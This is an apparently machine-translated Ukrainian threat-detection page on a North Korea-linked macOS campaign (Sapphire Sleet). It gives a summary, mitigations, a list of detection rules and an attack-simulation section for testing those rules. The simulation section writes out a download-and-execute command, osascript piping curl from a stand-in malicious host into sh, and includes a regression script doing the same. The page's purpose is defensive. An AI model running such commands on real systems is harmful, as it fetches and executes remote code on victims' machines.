Розбираємо macOS вторгнення Sapphire Sleet: від приманки до компромісу
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Microsoft Threat Intelligence повідомляє про кампанію, орієнтовану на macOS, яка приписується північнокорейському державному актору Sapphire Sleet. Операція покладається на соціальну інженерію, щоб переконати цільових осіб запустити шкідливі файли AppleScript, представлені як законне оновлення Zoom SDK. Після виконання, скрипт завантажує додаткові завантаження через curl and osascript, розширюючи проникнення в декілька етапів. Шкідливе програмне забезпечення розроблено для викрадення облікових даних, даних криптовалютних гаманців та іншої чутливої інформації, а також обходить вбудований захист macOS, щоб залишатися активним на скомпрометованих системах.
Розслідування
Розслідування окреслює багатостадійну ланцюжок зараження, що починається з .scpt файлу-приманки і продовжується через послідовність curl-до-osascript завантажень корисного навантаження. Дослідники ідентифікували декілька компонентів бекдору, включаючи com.apple.cli, службовий бінарник, icloudz, і com.google.chromes.updaters. Ворожі актори також були помічені на втручанні в базу даних macOS TCC для надання дозволів AppleEvents, використовуючи методи завантаження коду та встановлюючи збереження через демон запуску. Екфільтрація відбувалася через спеціальні строки користувача-агента і зв’язок через API Telegram Bot.
Мітигація
Apple вже випустила оновлення Safe Browsing і XProtect, щоб порушити інфраструктуру кампанії та компоненти шкідливого програмного забезпечення. Microsoft рекомендує блокувати виконання .scpt файлів, обмежувати небезпечні curl конвеєри, моніторити несанкціоновані зміни в базі даних TCC і перевіряти установки демонів запуску на наявність підозрілих записів. Користувачів слід попередити про непрохані запити на оновлення програмного забезпечення і радити не надавати облікові дані через несподівані діалоги чи скрипти.
Відповідь
Захисники повинні виявляти виконання зловмисного AppleScript, аномальні curl строки користувача-агента і вихідні з’єднання з відомими доменами командування та управління. Всі виявлені бінарні файли та демони запуску повинні бути негайно карантинізовані або видалені, після чого слід здійснити скидання облікових даних для постраждалих користувачів і перевірити цілісність бази даних TCC. Реагуючі на інциденти також повинні провести судову експертизу зібраних артефактів системи і відновити постраждалі дані з чистих резервних копій, де це необхідно.
Потік атаки
Детекції
Можливі C2 комунікації через HTTP до прямої IP з незвичайним портом (через проксі)
Перегляд
Можливе виконання через використання chmod та nohup у одному команді (через cmdline)
Перегляд
Перевірка облікових даних macOS через Dscl Authonly (через cmdline)
Перегляд
Спроба виконання curl з підозрою [MacOS] (через cmdline)
Перегляд
Архів було створено в тимчасовій теці MacOS (через file_event)
Перегляд
Небезпечні дозволи для бінарного файлу/скрипта/теки були встановлені (через cmdline)
Перегляд
IoCs (HashSha256) для виявлення: Аналіз проникнення Sapphire Sleet на macOS від приманки до компрометації
Перегляд
IoCs (SourceIP) для виявлення: Аналіз проникнення Sapphire Sleet на macOS від приманки до компрометації
Перегляд
IoCs (DestinationIP) для виявлення: Аналіз проникнення Sapphire Sleet на macOS від приманки до компрометації
Перегляд
Виявлення комунікації C2 Sapphire Sleet [Linux Network Connection]
Перегляд
Виявлення виконання AppleScript з каналом curl на macOS [Linux Process Creation]
Перегляд
Виконання симуляції
Попередня умова: Телеметрія та базова перевірка повинні були бути пройдені.
Обґрунтування: Цей розділ детально описує точне виконання техніки атаки (ТТК), призначеної для активації правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані ТТК та спрямовані на генерацію точного телеметрії, очікуваного логікою виявлення.
-
Опис нападу та команди:
Противник отримав зловмисний скрипт PowerShell-style, розміщений на віддаленому сервері. Щоб уникнути створення самостійного бінарного файлу, вони використовують вбудований інтерпретатор AppleScript (osascript) і передаютьcurlзавантаження безпосередньо в інтерпретатор, досягаючи «завантаження і виконання» в одній команді. Це відповідає правилуosascript+curlшаблоном.# Зловмисний командний рядок, що повинен активувати правило osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'Командний рядок містить як
osascriptandcurl, тому умови правила Sigma (selection_osascript and selection_curl) оцінюється як істинність. -
Скрипт регресійного тестування:
# simulate_osascript_curl.sh # Мета: Відтворити точну телеметрію, що повинна спрацьовувати правило виявлення. set -e # Визначити безпечний корисний навантаження для безпеки (echo замість справжнього зловмисного коду) MALICIOUS_URL="https://example.com/benign_payload.sh" # Створити хибний безпечний корисний вантаж, що просто виводить повідомлення. # У реальному тесті red‑team ви б розмістили реальний скрипт; тут ми зберігаємо його безпечно. curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true # Виконати AppleScript з curl, переданим у команду shell. osascript -e "do shell script "curl -s $MALICIOUS_URL | sh"" -
Команди очищення:
# cleanup_osascript_curl.sh # Видалити всі тимчасові файли і завершити непотрібні процеси. rm -f /tmp/benign_payload.sh pkill -f "osascript -e"